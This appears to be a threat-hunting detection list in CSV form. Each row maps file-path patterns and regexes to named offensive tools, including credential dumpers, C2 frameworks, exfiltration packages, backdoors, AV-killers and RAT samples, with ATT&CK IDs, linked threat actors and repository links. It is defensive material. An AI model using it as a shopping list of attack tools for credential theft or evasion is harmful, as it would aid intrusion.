"*\AttackerMITM.py*",".{0,1000}\\AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","14139" "*\attackState.cmd*",".{0,1000}\\attackState\.cmd.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","14140" "*\AtYourService.exe*",".{0,1000}\\AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","14144" "*\audio\exfiltrator.py*",".{0,1000}\\audio\\exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","14145" "*\AutoBlue-MS17-010-main*",".{0,1000}\\AutoBlue\-MS17\-010\-main.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","14146" "*\AutoCrypt.ahk*",".{0,1000}\\AutoCrypt\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14147" 
"*\autodiscover\brute.go*",".{0,1000}\\autodiscover\\brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","14148" "*\autoNTDS.py*",".{0,1000}\\autoNTDS\.py.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","14162" "*\AutoPwnKey-main*",".{0,1000}\\AutoPwnKey\-main.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14163" "*\AutoRecon-main*",".{0,1000}\\AutoRecon\-main.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14164" "*\AutoSmuggle\*.cs*",".{0,1000}\\AutoSmuggle\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red 
Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","14165" "*\avaddon.txt*",".{0,1000}\\avaddon\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14166" "*\avetdbg.txt*",".{0,1000}\\avetdbg\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","14168" "*\avira\getCredsavira.h*",".{0,1000}\\avira\\getCredsavira\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14169" "*\avira\getCredsavira2.h*",".{0,1000}\\avira\\getCredsavira2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential 
Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14170" "*\avoslocker.txt*",".{0,1000}\\avoslocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14171" "*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","14172" "*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","14173" "*\avredweb.py *",".{0,1000}\\avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","14174" "*\AWAYOKON-readme.txt*",".{0,1000}\\AWAYOKON\-readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14175" "*\AzureC2Proxy\*",".{0,1000}\\AzureC2Proxy\\.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - 
TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","14180" "*\AzureC2Relay*",".{0,1000}\\AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","14181" "*\AzureHound.ps1*",".{0,1000}\\AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14182" "*\AzureHound.ps1*",".{0,1000}\\AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","14183" "*\B0-K RAT Majdi SaaD.exe*",".{0,1000}\\B0\-K\sRAT\sMajdi\sSaaD\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14184" "*\b64.ps1*",".{0,1000}\\b64\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","14185" "*\BabelStrike.py*",".{0,1000}\\BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","14186" "*\Babylon RAT.exe*",".{0,1000}\\Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14187" "*\Babylon RAT.exe*",".{0,1000}\\Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14188" "*\BabyShark-master.zip*",".{0,1000}\\BabyShark\-master\.zip.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","14189" "*\backdoor.bat*",".{0,1000}\\backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14190" "*\backdoor.exe*",".{0,1000}\\backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14191" "*\Backdoor.exe*",".{0,1000}\\Backdoor\.exe.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","14192" "*\Backdoor.PHP.Agent.php*",".{0,1000}\\Backdoor\.PHP\.Agent\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14193" "*\backdoor\backdoor.mk*",".{0,1000}\\backdoor\\backdoor\.mk.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14194" "*\backdoor\backdoor.project*",".{0,1000}\\backdoor\\backdoor\.project.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14195" "*\backdoor_new.bat*",".{0,1000}\\backdoor_new\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14196" "*\backdoored\*",".{0,1000}\\backdoored\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","14197" "*\backdoored-script.ps1*",".{0,1000}\\backdoored\-script\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","14198" "*\BackgroundShell.exe*",".{0,1000}\\BackgroundShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","14199" "*\backhack.py*",".{0,1000}\\backhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","14200" "*\Backstab.sln*",".{0,1000}\\Backstab\.sln.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","14201" "*\Backstab64.exe*",".{0,1000}\\Backstab64\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","14202" "*\BackupCreds.csproj*",".{0,1000}\\BackupCreds\.csproj.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14203" "*\backupcreds.exe*",".{0,1000}\\backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential 
Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14204" "*\backupcreds.sln*",".{0,1000}\\backupcreds\.sln.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14205" "*\backupcreds\Program.cs*",".{0,1000}\\backupcreds\\Program\.cs.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14206" "*\BackupCreds-main*",".{0,1000}\\BackupCreds\-main.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14207" "*\BackupOperatorToDA*",".{0,1000}\\BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","14208" "*\badger_x64.dll*",".{0,1000}\\badger_x64\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 
- T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14211" "*\badger_x64_stealth_ret.bin*",".{0,1000}\\badger_x64_stealth_ret\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14212" "*\badger_x64_stealth_rtl.bin*",".{0,1000}\\badger_x64_stealth_rtl\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14213" "*\badger_x64_stealth_wait.bin*",".{0,1000}\\badger_x64_stealth_wait\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 
- T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14214" "*\badger_x86.dll*",".{0,1000}\\badger_x86\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14215" "*\BadPotato.csproj*",".{0,1000}\\BadPotato\.csproj.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","14216" "*\BadPotato.dll*",".{0,1000}\\BadPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","14217" 
"*\BadPotato.exe*",".{0,1000}\\BadPotato\.exe.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","14218" "*\BadRat 1.6\client.exe*",".{0,1000}\\BadRat\s1\.6\\client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14219" "*\badrat.ps1*",".{0,1000}\\badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","14220" "*\badrat_cs.exe*",".{0,1000}\\badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","14221" "*\badrat_server.py*",".{0,1000}\\badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - 
